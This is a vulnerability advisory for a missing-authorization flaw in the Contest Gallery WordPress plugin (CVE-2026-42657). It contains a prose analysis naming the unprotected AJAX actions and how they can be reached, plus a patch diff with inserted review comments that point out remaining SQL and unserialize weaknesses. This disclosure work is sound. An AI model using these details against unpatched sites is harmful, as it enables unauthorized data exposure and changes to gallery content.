Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 17, 2026

CVE-2026-42657: Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 – Missing Authorization (contest-gallery)

Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 28.1.7
Patched Version 29.0.0
Disclosed April 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42657:
A missing authorization vulnerability in the Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe plugin for WordPress, affecting all versions up to and including 28.1.7. Several backend AJAX handlers verify a nonce (or nothing at all) but never establish that the caller holds a backend role, so anyone who can reach them can perform gallery-management actions. The CVSS score is 5.3 (Medium). The advisory frames the attacker as unauthenticated; note, however, that every handler visible in the diff below is registered on a `wp_ajax_*` hook only, which WordPress dispatches for logged-in sessions (logged-out requests go to `wp_ajax_nopriv_*`), so the practical precondition is an account of any role plus, where one is checked, a usable nonce.

The root cause is the absence of capability checks on several AJAX handlers in `/wp-content/plugins/contest-gallery/ajax/ajax-functions-backend.php`. In the vulnerable version, `post_cg_get_current_permalinks` only called `cg_check_nonce()`, which verifies a nonce but does not establish that the user has backend access (administrator, editor or author role); a nonce proves that the request originated from a page the plugin rendered for that session, not that the session is privileged. `post_cg_move_to_another_gallery_get_inputs` had no check at all, neither nonce nor role. `post_cg_create_pdf_preview_backend` called `cg_check_nonce()` but performed no capability check. `post_cg_move_to_another_gallery` is the exception: it already carried inline role checks (`is_super_admin` or the administrator, editor or author role), and the patch replaces those with the centralized `cg_backend_ajax_require_access_json()` rather than adding a check that was missing. The patch introduces three helpers: `cg_backend_ajax_require_access_json()`, which requires `DOING_AJAX`, a logged-in user for whom `cg_user_has_backend_access()` is true, and a valid `cg_nonce`; `cg_backend_ajax_validate_gallery_hash_json()`, which compares a submitted gallery hash against `md5(wp_salt('auth') . '---cngl1---' . $GalleryID)`; and `cg_backend_ajax_error_json()`, a `wp_send_json_error()` wrapper for uniform error responses. The bodies of `cg_check_nonce()`, `cg_require_backend_access()` and `cg_user_has_backend_access()` are not part of the diff, so their exact behaviour is inferred from their names and call sites.

Exploitation consists of a POST to `/wp-admin/admin-ajax.php` with `action` set to one of the affected handlers: `post_cg_get_current_permalinks`, `post_cg_move_to_another_gallery_get_inputs`, `post_cg_move_to_another_gallery` or `post_cg_create_pdf_preview_backend`, sent from a logged-in session of any role (the hooks shown are `wp_ajax_*` only). `post_cg_get_current_permalinks` and `post_cg_create_pdf_preview_backend` require a valid nonce; since WordPress nonces are bound to the user ID and session token, that nonce must have been generated for the attacker's own session, and where the plugin renders it for a low-privilege user is not shown on this page. `post_cg_move_to_another_gallery_get_inputs` accepted the request with no nonce and no role check. `post_cg_move_to_another_gallery` takes `cgMoveRealId`, `cg_in_gallery_id_to_move`, `cgMoveFromGalleryID`, `cgMoveCategory` and `cgMoveAssigns` and moves an entry between galleries; as the last hunk shows, however, the pre-patch version of that handler did check for the administrator, editor or author role, so it was not reachable by low-privilege users, and its exposure was that no nonce check appears in the removed code and nothing validated that the entry belonged to the stated source gallery.

The patch adds centralized authorization to every affected handler. `cg_require_backend_access()` replaces `cg_check_nonce()` in `post_cg_get_current_permalinks` and in the `post_cg_create_pdf_preview_backend` wrapper; `cg_backend_ajax_require_access_json()` is called first thing in `post_cg_move_to_another_gallery_get_inputs` and `post_cg_move_to_another_gallery`, ahead of the handler's own database work. `cg_backend_ajax_validate_gallery_hash_json()` binds a move request to its source gallery: the expected hash depends only on `wp_salt('auth')` and the gallery ID, so it is a request-integrity check that complements, but does not replace, the role check. `post_cg_move_to_another_gallery` additionally verifies that the source and target galleries exist and differ, and that the entry really belongs to the source gallery. Finally, `post_cg_create_pdf_preview_backend` is split into `cg_create_pdf_preview_internal()`, which returns a result array instead of echoing, and a thin wrapper that performs the access check and then emits the legacy `cg_guid###...###cg_guid_end` output or the new `cg_error###...###cg_error_end` marker; this puts the check in one place, before any file or database writes.

The impact is unauthorized use of gallery-management features by any logged-in user (the advisory rates the attacker as unauthenticated; see the hook caveat above). Such a user can retrieve the current permalinks and the full list of galleries, categories and contact-form definitions, move entries between galleries, and trigger PDF-preview creation, which decodes attacker-supplied base64 image data, writes a PNG into the uploads directory, registers it as a WordPress attachment and rewrites the gallery row's `PdfPreview` or serialized `MultipleFiles` field. That amounts to data exposure (gallery structure), integrity loss (entries moved, preview records rewritten) and, through the attachment write, a foothold that could matter in combination with other weaknesses.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/contest-gallery/ajax/ajax-functions-backend.php
+++ b/contest-gallery/ajax/ajax-functions-backend.php
@@ -1,10 +1,60 @@
 <?php
+if (!function_exists('cg_backend_ajax_error_json')) {
+    function cg_backend_ajax_error_json($message, $status = 400, $code = 'cg_backend_ajax_error') {
+        wp_send_json_error(array(
+            'message' => $message,
+            'code' => $code
+        ), $status);
+    }
+}
+
+if (!function_exists('cg_backend_ajax_require_access_json')) {
+    function cg_backend_ajax_require_access_json() {
+        if (!defined('DOING_AJAX') || !DOING_AJAX) {
+            cg_backend_ajax_error_json('Invalid AJAX request.', 400, 'cg_invalid_ajax_request');
+        }
+
+        if (!is_user_logged_in() || !cg_user_has_backend_access()) {
+            cg_backend_ajax_error_json('This area can be edited only as administrator, editor or author.', 403, 'cg_missing_rights');
+        }
+
+        $cg_nonce = '';
+        if (isset($_POST['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_POST['cg_nonce']);
+        } elseif (isset($_GET['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_GET['cg_nonce']);
+        }
+
+        if (empty($cg_nonce) || !wp_verify_nonce($cg_nonce, 'cg_nonce')) {
+            wp_send_json_error(array(
+                'message' => 'WP nonce security token not set or not valid anymore.',
+                'code' => 'cg_nonce_invalid',
+                'version' => cg_get_version()
+            ), 403);
+        }
+    }
+}
+
+if (!function_exists('cg_backend_ajax_validate_gallery_hash_json')) {
+    function cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash) {
+        $GalleryID = absint($GalleryID);
+        if (empty($GalleryID) || empty($galleryHash)) {
+            cg_backend_ajax_error_json('Missing gallery validation data.', 403, 'cg_missing_gallery_hash');
+        }
+
+        $galleryHashToCompare = md5(wp_salt('auth') . '---cngl1---' . $GalleryID);
+        if ($galleryHash !== $galleryHashToCompare) {
+            cg_backend_ajax_error_json('Invalid gallery validation data.', 403, 'cg_invalid_gallery_hash');
+        }
+    }
+}
+
 // post_cg_get_current_permalinks
 add_action('wp_ajax_post_cg_get_current_permalinks', 'post_cg_get_current_permalinks');
 if (!function_exists('post_cg_get_current_permalinks')) {
     function post_cg_get_current_permalinks() {

-        cg_check_nonce();
+        cg_require_backend_access();

         global $wpdb;
         $tablename = $wpdb->prefix . "contest_gal1ery";
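Review bot: `cg_backend_ajax_validate_gallery_hash_json()` compares the submitted hash with `!==`; use `hash_equals($galleryHashToCompare, (string) $galleryHash)` so the comparison is constant-time, and because the expected value is `md5(wp_salt('auth') . '---cngl1---' . $GalleryID)` it depends only on the gallery ID, so it is a static per-gallery token rather than a per-user or per-request credential and should be documented as a request-binding check, not an authorization check (that is what `cg_backend_ajax_require_access_json()` is for). Also, `post_cg_get_current_permalinks` now calls `cg_require_backend_access()`, which this diff does not define; a reviewer cannot confirm from the patch alone that it performs the same login, role and nonce checks as the JSON helper added above it.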
@@ -54,10 +104,8 @@

 // create PDF preview
 add_action('wp_ajax_post_cg_create_pdf_preview_backend', 'post_cg_create_pdf_preview_backend');
-if (!function_exists('post_cg_create_pdf_preview_backend')) {
-    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
-
-        cg_check_nonce();
+if (!function_exists('cg_create_pdf_preview_internal')) {
+    function cg_create_pdf_preview_internal($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {

         global $wpdb;
         $tablename_posts = $wpdb->prefix . "posts";
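Review bot: renaming the handler body to `cg_create_pdf_preview_internal()` drops the `cg_check_nonce()` call from the function that does the work, so every path into it now relies on its caller for access control. The wrapper that re-adds the check keeps the old name and signature, including `$isFromFrontendUpload`; confirm that existing internal callers (the frontend upload path that parameter implies) were switched to `cg_create_pdf_preview_internal()`, otherwise they now hit `cg_require_backend_access()` and non-backend uploaders will be rejected, and conversely that nothing reachable from the frontend calls the internal function with request-controlled arguments.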
@@ -67,138 +115,149 @@

         $_POST = cg1l_sanitize_post($_POST);

-        //var_dump(33444);
-        //var_dump($_POST);
+        $result = [
+            'ok' => false,
+            'attach_id' => 0,
+            'preview_url' => '',
+            'error' => ''
+        ];

-        // create image attachment
         $wp_upload_dir = wp_upload_dir();
-        $currentUploadDir = $wp_upload_dir['basedir'];
-        $cgWpUploadToReplace = '';
-        $cgNewWpUploadWhichReplace = '';
-        if(empty($WpUpload)){
-            $WpUpload = absint($_POST['cg_wp_upload']);
+        $cgWpUploadToReplace = 0;
+        $cgNewWpUploadWhichReplace = 0;
+        if (empty($WpUpload)) {
+            $WpUpload = (!empty($_POST['cg_wp_upload'])) ? absint($_POST['cg_wp_upload']) : 0;
         }
-        if(empty($realId)){
-            $realId = absint($_POST['cgRealId']);
+        if (empty($realId)) {
+            $realId = (!empty($_POST['cgRealId'])) ? absint($_POST['cgRealId']) : 0;
         }
-        if(empty($cg_base_64)){
+        if (empty($cg_base_64)) {
             $cg_base_64 = (!empty($_POST['cg_base_64'])) ? $_POST['cg_base_64'] : '';
         }
-        if(!empty($_POST['cgWpUploadToReplace'])){
+        if (!empty($_POST['cgWpUploadToReplace'])) {
             $cgWpUploadToReplace = absint($_POST['cgWpUploadToReplace']);
         }
-        if(!empty($_POST['cgNewWpUploadWhichReplace'])){
+        if (!empty($_POST['cgNewWpUploadWhichReplace'])) {
             $cgNewWpUploadWhichReplace = absint($_POST['cgNewWpUploadWhichReplace']);
         }

-        $realIdRow = $wpdb->get_row( "SELECT * FROM $tablename WHERE id='$realId'" );
-        $WpUploadRow = $wpdb->get_row( "SELECT * FROM $tablename_posts WHERE ID='$WpUpload'" );
+        if (empty($WpUpload) || empty($realId)) {
+            $result['error'] = 'missing_parameters';
+            return $result;
+        }
+
+        $realIdRow = $wpdb->get_row("SELECT * FROM $tablename WHERE id='$realId'");
+        if (empty($realIdRow)) {
+            $result['error'] = 'missing_real_id_row';
+            return $result;
+        }

-        //var_dump('$cgWpUploadToReplace456');
-        //var_dump($cgWpUploadToReplace);
-        //var_dump('$cgNewWpUploadWhichReplace456');
-        //var_dump($cgNewWpUploadWhichReplace);
+        $WpUploadRow = $wpdb->get_row("SELECT * FROM $tablename_posts WHERE ID='$WpUpload'");
+        if (empty($WpUploadRow)) {
+            $result['error'] = 'missing_wp_upload_row';
+            return $result;
+        }

-        if(!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace)  && !empty($realIdRow->EcommerceEntry)){
+        if (!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace) && !empty($realIdRow->EcommerceEntry)) {
             $EcommerceEntry = $realIdRow->EcommerceEntry;
-            $ecommerceEntry = $wpdb->get_row( "SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'" );
+            $ecommerceEntry = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'");
             $removedWpUploadIdsFromSale = [$cgWpUploadToReplace];
-            //var_dump('cg_replace_ecommerce_file');
-            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [],$removedWpUploadIdsFromSale);
+            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [], $removedWpUploadIdsFromSale);
         }

-        // check multiple files
         $multipleFilesPdfPreview = 0;
         $multipleFilesTitle = '';
-        if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+        if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
             $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-            foreach($MultipleFiles as $file){
-                if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])){
-                    // post_title
-                    $multipleFilesPdfPreview = $file['PdfPreview'];// set for multiple files then
+            foreach ($MultipleFiles as $file) {
+                if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])) {
+                    $multipleFilesPdfPreview = $file['PdfPreview'];
                     $multipleFilesTitle = $file['post_title'];
                 }
             }
         }

-        //var_dump($realIdRow->PdfPreview);
-        //var_dump(get_post( $realIdRow->PdfPreview ));
-        if(!empty($realIdRow->PdfPreview) && !empty(get_post( $realIdRow->PdfPreview )) && $WpUpload == $realIdRow->WpUpload){
-            if(!$isFromFrontendUpload){
-                $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
-                echo 'cg_guid###'.$PdfPreviewImage[0].'###cg_guid_end';
-            }
-        }elseif(!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))){// set for multiple files then
-            if(!$isFromFrontendUpload){
-                $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
-                echo 'cg_guid###'.$multipleFilesPdfPreviewImage[0].'###cg_guid_end';
-            }
-        }else{
-            //var_dump(222);
+        if (!empty($realIdRow->PdfPreview) && !empty(get_post($realIdRow->PdfPreview)) && $WpUpload == $realIdRow->WpUpload) {
+            $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($realIdRow->PdfPreview);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        } elseif (!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))) {
+            $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($multipleFilesPdfPreview);
+            $result['preview_url'] = (!empty($multipleFilesPdfPreviewImage[0])) ? $multipleFilesPdfPreviewImage[0] : '';
+            return $result;
+        } else {
             $content = base64_decode(preg_replace('#^data:image/w+;base64,#i', '', $cg_base_64));
+            if (empty($content)) {
+                $result['error'] = 'missing_preview_payload';
+                return $result;
+            }
+
             $formImage = imagecreatefromstring($content);
+            if (!$formImage) {
+                $result['error'] = 'invalid_preview_payload';
+                return $result;
+            }

-            if(!empty($multipleFilesPdfPreview)){
-                $fullName = $multipleFilesTitle.'-cg-pdf-preview';
-            }else{
-                $fullName = $WpUploadRow->post_title.'-cg-pdf-preview';
+            if (!empty($multipleFilesPdfPreview)) {
+                $fullName = $multipleFilesTitle . '-cg-pdf-preview';
+            } else {
+                $fullName = $WpUploadRow->post_title . '-cg-pdf-preview';
             }
             $fullNamePath = $fullName;
             $fullNamePath = cg_pre_process_name_for_url_name($fullNamePath);
             $fullNamePath = cg_check_first_char_for_url_name_after_pre_processing($fullNamePath);
             $fullNamePath = cg_check_last_char_for_url_name_after_pre_processing($fullNamePath);
-            $fullNamePath = cg_sluggify_for_url($fullNamePath);// has to be tested with asia chars one time
+            $fullNamePath = cg_sluggify_for_url($fullNamePath);
             $fullNamePathFirst = $fullNamePath;

-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePathFirst.'.png';
-            //var_dump('$fullPath check');
-            //var_dump($fullPath);
-            if(file_exists($fullPath)){
-                //var_dump(112233);
+            $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePathFirst . '.png';
+            if (file_exists($fullPath)) {
                 $i = 0;
-                do{
-                    if($i==0){
+                do {
+                    if ($i == 0) {
                         $i = 1;
-                    }else{
+                    } else {
                         $i++;
                     }
-                    $add = '-'.$i;
-                    $fullNamePath = $fullNamePathFirst.$add;
-                    $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePath.'.png';
-                }while(file_exists($fullPath));
+                    $add = '-' . $i;
+                    $fullNamePath = $fullNamePathFirst . $add;
+                    $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePath . '.png';
+                } while (file_exists($fullPath));
             }

-            //var_dump('$fullPath');
-            //var_dump($fullPath);
-
-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            // for png
-            imagesavealpha($formImage,true);// required for png images... otherwise background black
-
-            //imagejpeg($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            //imagegif($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            imagepng($formImage,$fullPath);
-
-            //file_put_contents($fullNewPath,$content);
+            imagesavealpha($formImage, true);
+            imagepng($formImage, $fullPath);
+
+            if (!file_exists($fullPath)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_file_not_created';
+                return $result;
+            }

             $attachment = array(
-                'guid' => $wp_upload_dir['url']."/".$fullNamePath.'.png',
+                'guid' => $wp_upload_dir['url'] . "/" . $fullNamePath . '.png',
                 'post_mime_type' => 'image/png',
                 'post_title' => $fullName,
                 'post_content' => '',
                 'post_status' => 'inherit'
             );

-            $attach_id = wp_insert_attachment( $attachment, $fullPath );
-            $imagenew = get_post( $attach_id );
-            $fullsizepath = get_attached_file( $imagenew->ID );
-            $attach_data = wp_generate_attachment_metadata( $attach_id, $fullsizepath );
-            wp_update_attachment_metadata( $attach_id, $attach_data );
+            $attach_id = wp_insert_attachment($attachment, $fullPath);
+            if (empty($attach_id) || is_wp_error($attach_id)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_attachment_insert_failed';
+                return $result;
+            }
+
+            $imagenew = get_post($attach_id);
+            $fullsizepath = get_attached_file($imagenew->ID);
+            $attach_data = wp_generate_attachment_metadata($attach_id, $fullsizepath);
+            wp_update_attachment_metadata($attach_id, $attach_data);
+            imagedestroy($formImage);

             $wpdb->query($wpdb->prepare(
                 "
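Review bot: `cg_create_pdf_preview_internal()` still reads `cgWpUploadToReplace` and `cgNewWpUploadWhichReplace` straight from `$_POST` (the `if (!empty($_POST['cgWpUploadToReplace']))` block) even when `$WpUpload` and `$realId` were passed as arguments, so the `cg_replace_ecommerce_file()` call is driven by request data for every caller, internal ones included; pass those two IDs as parameters as well. Two smaller points: `$wpdb->get_row("SELECT * FROM $tablename WHERE id='$realId'")` and the `$tablename_posts` lookup still interpolate values (safe today only because of `absint()`) while the rest of the patch moved to `$wpdb->prepare()`, and the prefix-stripping regex reads `'#^data:image/w+;base64,#i'`, which matches a literal `w`; if that is not a rendering loss it should be `image/\w+`, otherwise non-strict `base64_decode()` silently treats the `data:image/png;base64,` prefix characters as data and `imagecreatefromstring()` fails on the result.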
@@ -206,37 +265,30 @@
 						(id, WpUpload, WpUploadPreview)
 						VALUES ( %s,%d,%d)
 					",
-                '',$WpUpload,$attach_id
+                '', $WpUpload, $attach_id
             ));

             $multipleFilesWpUploadForPdfPreview = 0;

-            if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+            if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-                foreach($MultipleFiles as $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload){
+                foreach ($MultipleFiles as $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload) {
                         $multipleFilesWpUploadForPdfPreview = $WpUpload;
                     }
                 }
             }

-            //var_dump('$multipleFilesWpUploadForPdfPreview');
-            //var_dump($multipleFilesWpUploadForPdfPreview);
-
-            if(!empty($multipleFilesWpUploadForPdfPreview)){
-                //var_dump('$multipleFilesPdfPreview');
-                //var_dump($multipleFilesPdfPreview);
+            if (!empty($multipleFilesWpUploadForPdfPreview)) {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
                 $MultipleFilesNew = [];
-                foreach($MultipleFiles as $order => $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload){
-                        //var_dump('set PdfPreview');
+                foreach ($MultipleFiles as $order => $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload) {
                         $file['PdfPreview'] = $attach_id;
                         $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'full');
                         $file['PdfPreviewImage'] = $PdfPreviewImage[0];
                         $PdfPreviewImageLarge = wp_get_attachment_image_src($attach_id, 'large');
                         $file['PdfPreviewImageLarge'] = $PdfPreviewImageLarge[0];
-                        // important to set PdfOriginal
                         $file['PdfOriginal'] = get_the_guid($file['WpUpload']);
                         $file['full'] = $PdfPreviewImage[0];
                         $file['guid'] = $PdfPreviewImage[0];
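Review bot: `unserialize($realIdRow->MultipleFiles)` on the stored column (twice in this hunk) is called without `['allowed_classes' => false]`; the data is an array of file descriptors, so pass that option, or use `maybe_unserialize()` guarded by `is_serialized()` as the `Field_Content` handling later in this patch does, to rule out object instantiation from a tampered row. The `%s` placeholder bound to `''` for the `id` column relies on auto-increment; a one-line comment saying so would spare the next reader a detour.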
@@ -251,42 +303,46 @@
                     }
                     $MultipleFilesNew[$order] = $file;
                 }
-                /*echo "<pre>";
-                    print_r($MultipleFilesNew);
-                echo "</pre>";*/
                 $MultipleFilesNew = serialize($MultipleFilesNew);
-                //var_dump('$realId set MultipleFiles');
-                //var_dump($realId);
-                // SET MultipleFiles='$MultipleFilesNew' ... serialized $MultipleFilesNew has to be in ''
                 $wpdb->query("UPDATE $tablename SET MultipleFiles='$MultipleFilesNew' WHERE id = $realId");
-            }else{
-                //var_dump('$realId set PdfPreview');
+            } else {
                 $wpdb->query("UPDATE $tablename SET PdfPreview=$attach_id WHERE id = $realId");
             }

-            if(!$isFromFrontendUpload){
-                if(!empty($realIdRow->Active)){
-                    $uploadFolder = wp_upload_dir();
-                    $thumbSizesWp = array();
-                    $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
-                    $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
-                    $thumbSizesWp['large_size_w'] = get_option("large_size_w");
-                    $imageArray = array();
-                    $pid = $realIdRow->id;
-                    $GalleryID = $realIdRow->GalleryID;
-                    $row = $wpdb->get_row( "SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
+            if (!$isFromFrontendUpload && !empty($realIdRow->Active)) {
+                $uploadFolder = wp_upload_dir();
+                $thumbSizesWp = array();
+                $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
+                $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
+                $thumbSizesWp['large_size_w'] = get_option("large_size_w");
+                $imageArray = array();
+                $pid = $realIdRow->id;
+                $GalleryID = $realIdRow->GalleryID;
+                $row = $wpdb->get_row("SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
+                          OR
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
                           GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-                    cg_create_json_files_when_activating($GalleryID,$row,$thumbSizesWp,$uploadFolder,$imageArray);
-                }
+                cg_create_json_files_when_activating($GalleryID, $row, $thumbSizesWp, $uploadFolder, $imageArray);
+            }

-                $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');
-                $PdfPreviewImage = $PdfPreviewImage[0];
+            $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');

-                echo 'cg_guid###'.$PdfPreviewImage.'###cg_guid_end';
-            }
+            $result['ok'] = true;
+            $result['attach_id'] = absint($attach_id);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        }
+    }
+}
+if (!function_exists('post_cg_create_pdf_preview_backend')) {
+    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
+        cg_require_backend_access();
+        $result = cg_create_pdf_preview_internal($WpUpload, $realId, $cg_base_64, $isFromFrontendUpload);
+        if (!empty($result['ok']) && !$isFromFrontendUpload && !empty($result['preview_url'])) {
+            echo 'cg_guid###' . $result['preview_url'] . '###cg_guid_end';
+        } elseif (empty($result['ok'])) {
+            echo 'cg_error###' . $result['error'] . '###cg_error_end';
         }
     }
 }
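Review bot: `$wpdb->query("UPDATE $tablename SET MultipleFiles='$MultipleFilesNew' WHERE id = $realId")` interpolates a serialized string that carries post titles and GUIDs without escaping, so a single quote in any of those values breaks the statement, and the rest of the patch's move to `$wpdb->prepare()` was not applied here; use `$wpdb->prepare("UPDATE $tablename SET MultipleFiles=%s WHERE id=%d", $MultipleFilesNew, $realId)` and the same for the `PdfPreview=$attach_id` update. In the wrapper, `echo 'cg_error###' . $result['error'] . '###cg_error_end'` is fine because the error strings are fixed identifiers, but a successful call with `$isFromFrontendUpload` true, or with an empty `preview_url`, now emits nothing at all; that matches the old behaviour, so a short comment would keep it from being read as a missing echo.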
@@ -296,212 +352,275 @@
 if (!function_exists('post_cg_move_to_another_gallery_get_inputs')) {
 	function post_cg_move_to_another_gallery_get_inputs() {

-    global $wpdb;
-    $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
-    $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
-    $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+        cg_backend_ajax_require_access_json();
+        $_POST = cg1l_sanitize_post($_POST);

-    $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+        $MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+        $galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+        cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-    $contact_forms_by_gallery_id = [];
-    foreach ($contact_forms as $form){
-        if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
-	        $contact_forms_by_gallery_id[$form->GalleryID] = [];
-        }
-	    if(is_serialized($form->Field_Content)){
-		    $form->Field_Content = unserialize($form->Field_Content);
+        global $wpdb;
+        $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+        $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
+        $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+        $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+
+        $contact_forms_by_gallery_id = [];
+        foreach ($contact_forms as $form){
+            if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
+                $contact_forms_by_gallery_id[$form->GalleryID] = [];
+            }
+            if(is_serialized($form->Field_Content)){
+                $form->Field_Content = unserialize($form->Field_Content);
+            }
+            $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
         }
-	    $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
-    }

-		$galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
-		$allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
-		$allCategoriesByGalleryIDArray = [];
+        $galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryIDArray = [];
         foreach ($allCategoriesByGalleryID as $row){
             if(!isset($allCategoriesByGalleryIDArray[$row->GalleryID])){
-	            $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
+                $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
             }
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
         }

-		?>
-    <script data-cg-processing="true">
-        cgJsClassAdmin.gallery.vars.allCategoriesByGalleryID = <?php echo json_encode($allCategoriesByGalleryIDArray);?>;
-        cgJsClassAdmin.gallery.vars.galleryIDs = <?php echo json_encode($galleryIDs);?>;// renew here for sure
-        cgJsClassAdmin.gallery.vars.contact_forms_by_gallery_id = <?php echo json_encode($contact_forms_by_gallery_id); ?>;
-    </script>
-<?php
